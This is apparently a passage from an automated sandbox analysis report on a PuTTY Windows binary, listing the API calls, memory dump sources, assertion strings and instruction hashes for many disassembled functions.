                      • Part of subcall function 00C63052: SetLastError.KERNEL32(00000000,00C5DB94,?,?,?,?,?,00C5DB94,?,00000000,?,00000003,00C5149B), ref: 00C630F8
                    • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00C68397
                    • IsValidCodePage.KERNEL32(00000000), ref: 00C683E0
                    • IsValidLocale.KERNEL32(?,00000001), ref: 00C683EF
                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00C68437
                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00C68456
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                    • String ID:
                    • API String ID: 415426439-0
                    • Opcode ID: d529aa82983fa196cba34a6bca15c7ced294a45e4f2f621a133f9381970d0d2b
                    • Instruction ID: ddadb40bcb86abd04e1a6314463b8d22d18fd61ae240c638522d2674dae21c51
                    • Opcode Fuzzy Hash: d529aa82983fa196cba34a6bca15c7ced294a45e4f2f621a133f9381970d0d2b
                    • Instruction Fuzzy Hash: 975151719002059FDB30DFA5DC85BBE77B8AF44B00F144679E511EB2A0EF749A48DB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C69103
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: FileFindFirst
                    • String ID:
                    • API String ID: 1974802433-0
                    • Opcode ID: 1a28c1c9fa718171fcb636ddfaf48b33c78f685d8055b7635d4347d97da3a3de
                    • Instruction ID: cab9900068683ff3d139ffdbcc5a87599a844e309a29a14f772d5b6de85522c8
                    • Opcode Fuzzy Hash: 1a28c1c9fa718171fcb636ddfaf48b33c78f685d8055b7635d4347d97da3a3de
                    • Instruction Fuzzy Hash: 1671D371905129AFDF30EF24CCD9AAEB7BDEB4A304F2442D9E01993251DA318E859F10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C4E536
                    • IsDebuggerPresent.KERNEL32 ref: 00C4E602
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C4E622
                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00C4E62C
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                    • String ID:
                    • API String ID: 254469556-0
                    • Opcode ID: 7a24bb0b3dbc03c56a4a7e73829bf728df96f30e41cfe9c81b456634b85f6d0b
                    • Instruction ID: 168cdae28bce8e793246df8d132483f06b5f1f90509b50014c602e02f080bc39
                    • Opcode Fuzzy Hash: 7a24bb0b3dbc03c56a4a7e73829bf728df96f30e41cfe9c81b456634b85f6d0b
                    • Instruction Fuzzy Hash: CD31E575D452189BDB20DFA4D989BCDBBB8BF08304F1041AAE409AB250EB759B849F45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: __aulldiv
                    • String ID: UUUU$UUUU
                    • API String ID: 3732870572-2425103364
                    • Opcode ID: 56facb44e308b05d7b9a339a859ae007ab4033dc61d664f0558e399edbc0109d
                    • Instruction ID: ab9423b8e9051f3ff927bec930e8f1fa077d82a504c7051c6c6e082e9c6acc4e
                    • Opcode Fuzzy Hash: 56facb44e308b05d7b9a339a859ae007ab4033dc61d664f0558e399edbc0109d
                    • Instruction Fuzzy Hash: DA41BF327042154BC318CA3DCD5572AF7E6EBD8751F0A862EF488DB3E5EA35D9118A81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SendDlgItemMessageA.USER32(?,?,000000B1,?,?), ref: 00BD302A
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c, xrefs: 00BD3006
                    • c && c->ctrl->type == CTRL_EDITBOX, xrefs: 00BD300B
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ItemMessageSend
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c$c && c->ctrl->type == CTRL_EDITBOX
                    • API String ID: 3015471070-2506229160
                    • Opcode ID: e75c7fffa8844b9ba7e33a73b873d6c0cef42a436498162785e210f31cb0300b
                    • Instruction ID: 1aeb6343b3516dc55feaa9675f3a32bdade8ccbf96240b4355cdf10fe0671c18
                    • Opcode Fuzzy Hash: e75c7fffa8844b9ba7e33a73b873d6c0cef42a436498162785e210f31cb0300b
                    • Instruction Fuzzy Hash: 12115B76644309AFD2109F44DC81A6AF3E8FB59708F050966F944A3312E372BE549BA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetProcAddress.KERNEL32(00000000,GetVersionExA), ref: 00BECBF6
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: AddressProc
                    • String ID: GetVersionExA$kernel32.dll
                    • API String ID: 190572456-3521452493
                    • Opcode ID: 5cf4abacc4a8ea742b28cadac88932a6a0961d7252815395a26b674182315a08
                    • Instruction ID: 4f6b6b4181bd0b7cbfc54b46cd6b75391cfd2541781d9d3598e9bc57e9debb60
                    • Opcode Fuzzy Hash: 5cf4abacc4a8ea742b28cadac88932a6a0961d7252815395a26b674182315a08
                    • Instruction Fuzzy Hash: 6911D3B09043D19BD7609F39ED46B0A7FE8E704710F114668E45A8B3E2D7389942CB82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/crypto/mpint.c$word < x->nw$x0->nw == x1->nw
                    • API String ID: 0-1701883408
                    • Opcode ID: 998b6fd227dd217cdb0c3c06d4efdfc66f75548ecaa6d89382d7a2e5bf4d2a12
                    • Instruction ID: 081fced9dfb4b15b60407afd9b3c8b07428aa893e5a516e0697d0f74e3351bcd
                    • Opcode Fuzzy Hash: 998b6fd227dd217cdb0c3c06d4efdfc66f75548ecaa6d89382d7a2e5bf4d2a12
                    • Instruction Fuzzy Hash: 4082C175A04211DFD720DF18C881A6AB7E2FF8A300F59856CE85A9B341D731FD92EB81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00C63052: GetLastError.KERNEL32(?,?,00C559E8,?,?,?,?,00C5DBC7,00C5DB94,?,?,?,?,?,00C5DB94,?), ref: 00C63056
                      • Part of subcall function 00C63052: SetLastError.KERNEL32(00000000,00C5DB94,?,?,?,?,?,00C5DB94,?,00000000,?,00000003,00C5149B), ref: 00C630F8
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C685D0
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C6861A
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C686E0
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: InfoLocale$ErrorLast
                    • String ID:
                    • API String ID: 661929714-0
                    • Opcode ID: 9352f3fa7f033912e5479696f90e4bbc7de70009343605f9dd9629abb076d4d5
                    • Instruction ID: 061369c4fa4167abf2d53e3f7b0cec4a3ca01ac5a0d5567d413cc338dd1522f9
                    • Opcode Fuzzy Hash: 9352f3fa7f033912e5479696f90e4bbc7de70009343605f9dd9629abb076d4d5
                    • Instruction Fuzzy Hash: 2361B0716102179FDB389F24CDC2BAA77A8EF04704F204279FD25C6685EB78DA89DB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00C64235
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00C6423F
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00C6424C
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: c98941de115b45ea0b9139a97609fdabd13a51509dcf9fdddd38a313c590125e
                    • Instruction ID: f6ccb648ff22ea37e6b1cde5a237d5d6481c2fb64aabee993d1d501146415e89
                    • Opcode Fuzzy Hash: c98941de115b45ea0b9139a97609fdabd13a51509dcf9fdddd38a313c590125e
                    • Instruction Fuzzy Hash: F731A374911328ABCB21DF64DD8979DBBB8BF48310F6041EAE81DA7251EB709F858F44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00BE8710: _strlen.LIBCMT ref: 00BE8720
                    • IsIconic.USER32 ref: 00BB8337
                    • SetWindowTextW.USER32(00000000,?), ref: 00BB8357
                    • SetWindowTextA.USER32(00000000,00000000), ref: 00BB8375
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: TextWindow$Iconic_strlen
                    • String ID:
                    • API String ID: 1204891203-0
                    • Opcode ID: f15d14617b27244128be384d6aff3c1f3640ea34a6c8d977fb2759c27fa3aefa
                    • Instruction ID: d0ca70ac5b674cbb159731837a2bbaf52ebd0ac5754f2f1f78d58d43d1421801
                    • Opcode Fuzzy Hash: f15d14617b27244128be384d6aff3c1f3640ea34a6c8d977fb2759c27fa3aefa
                    • Instruction Fuzzy Hash: 2401B5F19401406BEB512B20BC46F7F3BE9DB40719F1C01A4FD06A31B1EF629824D7A6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00BE8710: _strlen.LIBCMT ref: 00BE8720
                    • IsIconic.USER32 ref: 00BB8287
                    • SetWindowTextW.USER32(00000000,?), ref: 00BB82A7
                    • SetWindowTextA.USER32(00000000,00000000), ref: 00BB82C5
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: TextWindow$Iconic_strlen
                    • String ID:
                    • API String ID: 1204891203-0
                    • Opcode ID: 19d2a7fd081bfd5d22daf9a34d388b6e19c859b91b8bf1ff2fc01b35fd2d6a8d
                    • Instruction ID: b3680936a374ae683ee9169f9ca6c66ae45d46321b1279f69bccc4ebc910a8c5
                    • Opcode Fuzzy Hash: 19d2a7fd081bfd5d22daf9a34d388b6e19c859b91b8bf1ff2fc01b35fd2d6a8d
                    • Instruction Fuzzy Hash: 3F01B5F19406406BEF116B11BC47B7F3BA9EB40765F1805A4FD05A3161EB615824D792
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • chars != NULL, xrefs: 00BC2365
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/terminal/terminal.c, xrefs: 00BC2360, 00BC237B
                    • nchars_used < nchars_got, xrefs: 00BC2380
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/terminal/terminal.c$chars != NULL$nchars_used < nchars_got
                    • API String ID: 0-1149337742
                    • Opcode ID: 55954b8d218f43b2998781f8ff3390f467f2b0b8ba5a41412e2facfeb24b5408
                    • Instruction ID: af06d1bce26198e1caf79d4e396052daf7eff2760dd83c586ad41094bbde1e27
                    • Opcode Fuzzy Hash: 55954b8d218f43b2998781f8ff3390f467f2b0b8ba5a41412e2facfeb24b5408
                    • Instruction Fuzzy Hash: F322F5B05047808FD734DB34D885FABB7E2EB95314F1488ADE49A87292E775E984CB42
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/crypto/mpint.c$len <= pool->nw$scratch.nw >= mp_mul_scratchspace_unary(inlen)
                    • API String ID: 0-2369011873
                    • Opcode ID: 3090149e99c9dcc4324d782b91d065f615a5fa84c094bb1159aad1e0a5cd1e44
                    • Instruction ID: 3bbd31df8e983c68ca681fa746f81fe2ba980868dc40c57a06349103f2de944f
                    • Opcode Fuzzy Hash: 3090149e99c9dcc4324d782b91d065f615a5fa84c094bb1159aad1e0a5cd1e44
                    • Instruction Fuzzy Hash: 3B127D71B093019FC724DF68C490AAAB7E1BF89304F15893DE99AC7341E771AD85DB82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/crypto/ntru.c$n != 0$n == 1
                    • API String ID: 0-484143442
                    • Opcode ID: 6b742fca16dfbd3345a4ee3fb244c9c2857a9467f38cd278ee5018807bb1b858
                    • Instruction ID: b188cf9a8a22ffa9fc9036718e6bd910f6449b7ea657455ba0bddabac285eacc
                    • Opcode Fuzzy Hash: 6b742fca16dfbd3345a4ee3fb244c9c2857a9467f38cd278ee5018807bb1b858
                    • Instruction Fuzzy Hash: AE91A2B1A04702AFD324DF19C881B1AB7E2FF84304F19896CE5995B3A1E772F955CB41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindFirstFileA.KERNEL32(00000000), ref: 00C27B62
                    • FindClose.KERNEL32(00000000), ref: 00C27B79
                    • FindWindowA.USER32 ref: 00C27B8D
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirstWindow
                    • String ID:
                    • API String ID: 2475344593-0
                    • Opcode ID: b1fd8128ad765f2d36a4ec1c87c1487be178e43059d191c72afd48d6e61e07cb
                    • Instruction ID: ef9d3bb99ba781a3f97563ea16d87fd852028eaa032d3e863b0746cc10502cf0
                    • Opcode Fuzzy Hash: b1fd8128ad765f2d36a4ec1c87c1487be178e43059d191c72afd48d6e61e07cb
                    • Instruction Fuzzy Hash: 45F02BB16051505BC6207B39FC8ABBF7395DB8E365F140229FC6AC7290E7359C05E293
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/ssh/zlib.c, xrefs: 00C290DC
                    • !dctx->outblk, xrefs: 00C290E1
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: !dctx->outblk$/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/ssh/zlib.c
                    • API String ID: 0-702135274
                    • Opcode ID: 3f636ded9a74e5e9f267401e4b834ee95e9aee9f8fe106900541f3f1b97a5473
                    • Instruction ID: 8369228ec8c6d4c2382f74bf76d757f4e654151838dff30409705d1518707d1e
                    • Opcode Fuzzy Hash: 3f636ded9a74e5e9f267401e4b834ee95e9aee9f8fe106900541f3f1b97a5473
                    • Instruction Fuzzy Hash: AF12EF71908621CBCB14CF29D498369B7A5FF85320F14C2ADD8D98B788DB74AC46DFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: IconicShowWindow
                    • String ID:
                    • API String ID: 3061500023-0
                    • Opcode ID: 29db090a15a727dc06a489d8120910b302313e16a4190764d5ab56894211c842
                    • Instruction ID: 0fe4e4cfcde00704b5b135d1a4c185285b8d854a7d936bd0dcff0bb42c159a5f
                    • Opcode Fuzzy Hash: 29db090a15a727dc06a489d8120910b302313e16a4190764d5ab56894211c842
                    • Instruction Fuzzy Hash: 8BD09EF02451009BEB112B24BE547BE7BDDEB16741F1844A0F9C6C35B1EF768810E619
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/ssh/crc-attack-detector.c, xrefs: 00C28120, 00C282F9
                    • !(len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) || len % SSH_BLOCKSIZE != 0), xrefs: 00C28125
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: !(len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) || len % SSH_BLOCKSIZE != 0)$/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/ssh/crc-attack-detector.c
                    • API String ID: 0-3667554043
                    • Opcode ID: e8c19ab2448110f98fcd3ae1a63b8ca7fc0b94aa30379c0840c8e53b7f950fbf
                    • Instruction ID: c534e94b8699e5bada6f2adf7e46fe1b258792cf60e6f83a7e2ddb93cac48b4c
                    • Opcode Fuzzy Hash: e8c19ab2448110f98fcd3ae1a63b8ca7fc0b94aa30379c0840c8e53b7f950fbf
                    • Instruction Fuzzy Hash: 7C51E1716057119BCB24CF14E891A2AB3E1FF98704F15452CE89A97B91EF70FE19CB81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • h->hlen <= MAX_HASH_LEN, xrefs: 00C2CA90
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/crypto/rsa.c, xrefs: 00C2CA8B
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
